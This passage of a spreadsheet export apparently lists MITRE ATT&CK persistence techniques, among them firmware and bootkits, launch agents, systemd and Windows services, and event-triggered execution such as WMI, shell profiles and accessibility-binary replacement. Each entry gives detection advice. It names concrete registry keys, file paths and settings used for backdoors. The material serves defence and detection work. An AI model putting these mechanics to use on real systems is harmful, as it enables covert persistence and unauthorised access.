System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/001</t>
  </si>
  <si>
    <t>19 December 2019</t>
  </si>
  <si>
    <t>19 May 2020</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: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 (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)</t>
  </si>
  <si>
    <t>Jean-Ian Boutin, ESET; McAfee; Ryan Becwar</t>
  </si>
  <si>
    <t>Pre-OS Boot: Component Firmware</t>
  </si>
  <si>
    <t>Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/002</t>
  </si>
  <si>
    <t>Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.</t>
  </si>
  <si>
    <t>Ability to update component device firmware from the host operating system.</t>
  </si>
  <si>
    <t>Pre-OS Boot: Bootkit</t>
  </si>
  <si>
    <t>Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/003</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</t>
  </si>
  <si>
    <t>Pre-OS Boot: ROMMONkit</t>
  </si>
  <si>
    <t>Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/004</t>
  </si>
  <si>
    <t>There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.</t>
  </si>
  <si>
    <t>Pre-OS Boot: TFTP Boot</t>
  </si>
  <si>
    <t>Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/005</t>
  </si>
  <si>
    <t>Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) 
Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.  
Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection).  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543</t>
  </si>
  <si>
    <t>03 November 2021</t>
  </si>
  <si>
    <t>Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.  
Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. 
Monitor for changes to files associated with system-level processes.</t>
  </si>
  <si>
    <t>Create or Modify System Process: Launch Agent</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;~/Library/LaunchAgents&lt;/code&gt;.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the &lt;code&gt;Label&lt;/code&gt;, &lt;code&gt;ProgramArguments &lt;/code&gt;, and &lt;code&gt;RunAtLoad&lt;/code&gt; keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.
 Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.
Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the &lt;code&gt;RunAtLoad&lt;/code&gt; or &lt;code&gt;KeepAlive&lt;/code&gt; keys set to &lt;code&gt;true&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/001</t>
  </si>
  <si>
    <t>17 January 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.
Ensure Launch Agent's &lt;code&gt; ProgramArguments &lt;/code&gt; key pointing to executables located in the &lt;code&gt;/tmp&lt;/code&gt; or &lt;code&gt;/shared&lt;/code&gt; folders are in alignment with enterprise policy. Ensure all Launch Agents with the &lt;code&gt;RunAtLoad&lt;/code&gt; key set to &lt;code&gt;true&lt;/code&gt; are in alignment with policy. </t>
  </si>
  <si>
    <t>Create or Modify System Process: Systemd Service</t>
  </si>
  <si>
    <t>Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.
Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories and have the file extension &lt;code&gt;.service&lt;/code&gt;. Each service unit file may contain numerous directives that can execute system commands:
* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. 
* ExecReload directive covers when a service restarts. 
* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)
While adversaries typically require root privileges to create/modify service unit files in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories, low privilege users can create/modify service unit files in directories such as &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/002</t>
  </si>
  <si>
    <t>09 October 2020</t>
  </si>
  <si>
    <t>Create or Modify System Process: Windows Service</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). 
Adversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.
An adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used. 
Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/003</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</si>
  <si>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</si>
  <si>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Matthew Demaske, Adaptforward; Pedro Harrison; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Create or Modify System Process: Launch Daemon</t>
  </si>
  <si>
    <t>Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in &lt;code&gt;/System/Library/LaunchDaemons/&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt;. Required Launch Daemons parameters include a &lt;code&gt;Label&lt;/code&gt; to identify the task, &lt;code&gt;Program&lt;/code&gt; to provide a path to the executable, and &lt;code&gt;RunAtLoad&lt;/code&gt; to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
Adversaries may install a Launch Daemon configured to execute at startup by using the &lt;code&gt;RunAtLoad&lt;/code&gt; parameter set to &lt;code&gt;true&lt;/code&gt; and the &lt;code&gt;Program&lt;/code&gt; parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)
Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as &lt;code&gt;usr/local/bin&lt;/code&gt; to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543/004</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for new files added to the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder. The System LaunchDaemons are protected by SIP.
Some legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the &lt;code&gt;RunAtLoad&lt;/code&gt; parameter set to true, ensure the &lt;code&gt;Program&lt;/code&gt; parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as &lt;code&gt;Program&lt;/code&gt; and &lt;code&gt;ProgramArguments&lt;/code&gt; parameters but one must be present.(Citation: launchd Keywords for plists)
</t>
  </si>
  <si>
    <t>Administrator, root</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. 
Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)
Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546</t>
  </si>
  <si>
    <t>22 January 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. 
These mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. 
Monitor for processes, API/System calls, and other common ways of manipulating these event repositories. 
Tools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.  
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process.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 </t>
  </si>
  <si>
    <t>Event Triggered Execution: Change Default File Association</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under &lt;code&gt;HKEY_CLASSES_ROOT\.[extension]&lt;/code&gt;, for example &lt;code&gt;HKEY_CLASSES_ROOT\.txt&lt;/code&gt;. The entries point to a handler for that extension located at &lt;code&gt;HKEY_CLASSES_ROOT\[handler]&lt;/code&gt;. The various commands are then listed as subkeys underneath the shell key at &lt;code&gt;HKEY_CLASSES_ROOT\[handler]\shell\[action]\command&lt;/code&gt;. For example: 
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/001</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</si>
  <si>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</si>
  <si>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Stefan Kanthak; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Event Triggered Execution: Screensaver</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in &lt;code&gt;C:\Windows\System32\&lt;/code&gt;, and &lt;code&gt;C:\Windows\sysWOW64\&lt;/code&gt;  on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (&lt;code&gt;HKCU\Control Panel\Desktop\&lt;/code&gt;) and could be manipulated to achieve persistence:
* &lt;code&gt;SCRNSAVE.exe&lt;/code&gt; - set to malicious PE path
* &lt;code&gt;ScreenSaveActive&lt;/code&gt; - set to '1' to enable the screensaver
* &lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; - set to '0' to not require a password to unlock
* &lt;code&gt;ScreenSaveTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/002</t>
  </si>
  <si>
    <t>Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.</t>
  </si>
  <si>
    <t>Bartosz Jerzman</t>
  </si>
  <si>
    <t>Event Triggered Execution: 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</si>
  <si>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 (Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/003</t>
  </si>
  <si>
    <t>Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: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(Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).</t>
  </si>
  <si>
    <t>Brent Murphy, Elastic; David French, Elastic</t>
  </si>
  <si>
    <t>Event Triggered Execution: Unix Shell Configuration Modification</t>
  </si>
  <si>
    <t>Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (&lt;code&gt;/etc&lt;/code&gt;) and the user’s home directory (&lt;code&gt;~/&lt;/code&gt;) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. 
Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt; files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into &lt;code&gt;~/.bash_profile&lt;/code&gt;, &lt;code&gt;~/.bash_login&lt;/code&gt;, or &lt;code&gt;~/.profile&lt;/code&gt; which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used &lt;code&gt;~/.bash_profile&lt;/code&gt; to ensure execution. Adversaries have also leveraged the &lt;code&gt;~/.bashrc&lt;/code&gt; file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the &lt;code&gt;~/.bash_logout&lt;/code&gt; file to execute malicious commands at the end of a session. 
For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using &lt;code&gt;/etc/profile&lt;/code&gt;, &lt;code&gt;/etc/zshenv&lt;/code&gt;, &lt;code&gt;/etc/zprofile&lt;/code&gt;, and &lt;code&gt;/etc/zlogin&lt;/code&gt;.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with &lt;code&gt;~/.zprofile&lt;/code&gt; and &lt;code&gt;~/.zlogin&lt;/code&gt;. The interactive shell uses the &lt;code&gt;~/.zshrc&lt;/code&gt; to configure the user environment. Upon exiting, &lt;code&gt;/etc/zlogout&lt;/code&gt; and &lt;code&gt;~/.zlogout&lt;/code&gt; are executed. For legacy programs, macOS executes &lt;code&gt;/etc/bashrc&lt;/code&gt; on startup.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/004</t>
  </si>
  <si>
    <t>20 August 2021</t>
  </si>
  <si>
    <t xml:space="preserve">While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.
Monitor for changes to &lt;code&gt;/etc/profile&lt;/code&gt; and &lt;code&gt;/etc/profile.d&lt;/code&gt;, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) 
For most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the &lt;code&gt;/etc/shells&lt;/code&gt; file.
</t>
  </si>
  <si>
    <t>Robert Wilson; Tony Lambert, Red Canary</t>
  </si>
  <si>
    <t>Event Triggered Execution: Trap</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The &lt;code&gt;trap&lt;/code&gt; command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like &lt;code&gt;ctrl+c&lt;/code&gt; and &lt;code&gt;ctrl+d&lt;/code&gt;.
Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/005</t>
  </si>
  <si>
    <t>Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.</t>
  </si>
  <si>
    <t>Event Triggered Execution: LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/006</t>
  </si>
  <si>
    <t>Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</t>
  </si>
  <si>
    <t>Event Triggered Execution: Netsh Helper DLL</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/007</t>
  </si>
  <si>
    <t>It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>Event Triggered Execution: Accessibility Features</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
Two common accessibility programs are &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt;, launched when the shift key is pressed five times and &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)
Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in &lt;code&gt;%systemdir%\&lt;/code&gt;, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;
* Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;
* Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;
* Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
* App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1546/008</t>
  </si>
  <si>
    <t>13 May 2020</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</si>
  <si>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</si>
  <si>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Paul Speulstra, AECOM Global Security Operations Center</t>
  </si>
  <si>
    <t>Event Triggered Execution: AppCert DLLs</t>
  </si>
  <si>
